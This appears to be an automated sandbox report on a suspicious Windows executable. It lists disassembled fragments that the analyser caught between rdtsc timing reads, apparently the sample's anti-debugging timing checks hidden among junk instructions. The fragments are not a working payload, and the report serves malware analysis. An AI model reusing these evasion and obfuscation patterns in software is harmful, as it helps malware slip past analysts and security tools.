Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7115C second address: E71168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAAD0E3C56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71168 second address: E7116D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7116D second address: E7119D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAD0E3C58h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jnl 00007FAAAD0E3C56h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FAAAD0E3C62h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7119D second address: E711A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712F0 second address: E712FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712FA second address: E712FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E712FE second address: E71304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71304 second address: E71310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E716DA second address: E71700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FAAAD0E3C64h 0x0000000f jmp 00007FAAAD0E3C5Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71700 second address: E7170B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FAAACBBF1F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7170B second address: E71711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E71C99 second address: E71C9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7206E second address: E7208A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FAAAD0E3C64h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68012 second address: E68016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E68016 second address: E6802B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAAD0E3C5Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72A56 second address: E72A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72B8B second address: E72BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C60h 0x00000007 jmp 00007FAAAD0E3C67h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FAAAD0E3C5Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E72BCA second address: E72BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73048 second address: E73053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73053 second address: E73059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E73059 second address: E7306D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E76743 second address: E76764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAACBBF207h 0x00000009 jns 00007FAAACBBF1F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E76764 second address: E76768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7A00E second address: E7A018 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB5C second address: E7FB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB60 second address: E7FB7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAAACBBF1FDh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FAAACBBF1F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7FB7D second address: E7FBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Dh 0x00000007 jmp 00007FAAAD0E3C67h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FAAAD0E3C6Ch 0x00000014 jmp 00007FAAAD0E3C66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3FF0A second address: E3FF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E3FF0E second address: E3FF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E7F736 second address: E7F73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E81A01 second address: E81A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E81AD1 second address: E81AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82833 second address: E82838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82955 second address: E8295B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8295B second address: E82976 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAD0E3C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C5Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E82976 second address: E82984 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83112 second address: E83118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83118 second address: E8311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8311C second address: E8316F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAAAD0E3C58h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+12A32BC3h] 0x0000002d push 00000000h 0x0000002f call 00007FAAAD0E3C5Dh 0x00000034 add dword ptr [ebp+12BB539Eh], eax 0x0000003a pop esi 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f jng 00007FAAAD0E3C56h 0x00000045 pop edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8316F second address: E83181 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83B50 second address: E83BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C69h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12BB6512h], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FAAAD0E3C58h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 jnc 00007FAAAD0E3C61h 0x00000038 pushad 0x00000039 movsx ecx, dx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f call 00007FAAAD0E3C5Bh 0x00000044 or dword ptr [ebp+12A33769h], eax 0x0000004a pop edi 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d push edi 0x0000004e pushad 0x0000004f popad 0x00000050 pop edi 0x00000051 jne 00007FAAAD0E3C58h 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007FAAAD0E3C65h 0x0000005f pushad 0x00000060 jmp 00007FAAAD0E3C61h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83A35 second address: E83A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E83A48 second address: E83A4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E86BDA second address: E86BE7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E875CF second address: E875D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E875D3 second address: E875F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAAACBBF1F8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jmp 00007FAAACBBF1FEh 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8C898 second address: E8C89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E8E96B second address: E8E982 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAACBBF1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8E982 second address: E8E988 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8FAA8 second address: E8FB16 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12BBC993h], ecx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FAAACBBF1F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 movzx ebx, dx 0x00000033 movsx edi, dx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FAAACBBF1F8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 movsx ebx, bx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FAAACBBF202h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E92AC9 second address: E92AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E93AB3 second address: E93AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAAACBBF1F6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FAAACBBF1FBh 0x00000012 nop 0x00000013 jmp 00007FAAACBBF1FAh 0x00000018 push 00000000h 0x0000001a and edi, dword ptr [ebp+12A334E9h] 0x00000020 push 00000000h 0x00000022 jnl 00007FAAACBBF1FBh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E93AF2 second address: E93AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E93AF6 second address: E93AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E94986 second address: E94A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAAAD0E3C56h 0x00000009 jmp 00007FAAAD0E3C68h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jnp 00007FAAAD0E3C66h 0x00000018 jmp 00007FAAAD0E3C60h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FAAAD0E3C58h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 and edi, dword ptr [ebp+12A31A16h] 0x0000003e push 00000000h 0x00000040 add ebx, 5CB4B79Ch 0x00000046 push 00000000h 0x00000048 xor dword ptr [ebp+12A3349Fh], ebx 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jns 00007FAAAD0E3C58h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E95A90 second address: E95A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E96B30 second address: E96B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E96B4A second address: E96B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E96B50 second address: E96B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E89EA8 second address: E89EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8CA19 second address: E8CA1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8EB83 second address: E8EB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E90D3B second address: E90D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E91D4A second address: E91D54 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAACBBF1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E93C6F second address: E93D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FAAAD0E3C58h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007FAAAD0E3C5Dh 0x00000027 push dword ptr fs:[00000000h] 0x0000002e call 00007FAAAD0E3C63h 0x00000033 jnl 00007FAAAD0E3C58h 0x00000039 pop ebx 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 jl 00007FAAAD0E3C5Ah 0x00000047 mov di, CD2Dh 0x0000004b mov eax, dword ptr [ebp+12A312D5h] 0x00000051 mov edi, dword ptr [ebp+12A33711h] 0x00000057 push FFFFFFFFh 0x00000059 movsx edi, ax 0x0000005c nop 0x0000005d jnc 00007FAAAD0E3C6Bh 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FAAAD0E3C63h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E95CB1 second address: E95CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FAAACBBF207h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E9BC89 second address: E9BC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E89EB1 second address: E89EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E8EB88 second address: E8EBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C69h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E91D54 second address: E91D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E89EB5 second address: E89EC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E89EC2 second address: E89EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E35D44 second address: E35D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E35D55 second address: E35D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E35D5B second address: E35D6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FAAAD0E3C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: E35D6A second address: E35DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAACBBF1F6h 0x0000000a jmp 00007FAAACBBF1FDh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007FAAACBBF21Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAAACBBF207h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EAFDC9 second address: EAFDFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Eh 0x00000007 push ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FAAAD0E3C64h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jg 00007FAAAD0E3C56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EAFDFD second address: EAFE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jng 00007FAAACBBF1F6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EAFE12 second address: EAFE20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAAAD0E3C5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB070D second address: EB0711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: EB563E second address: EB564A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007FAAAD0E3C56h 0x0000000c rdtsc
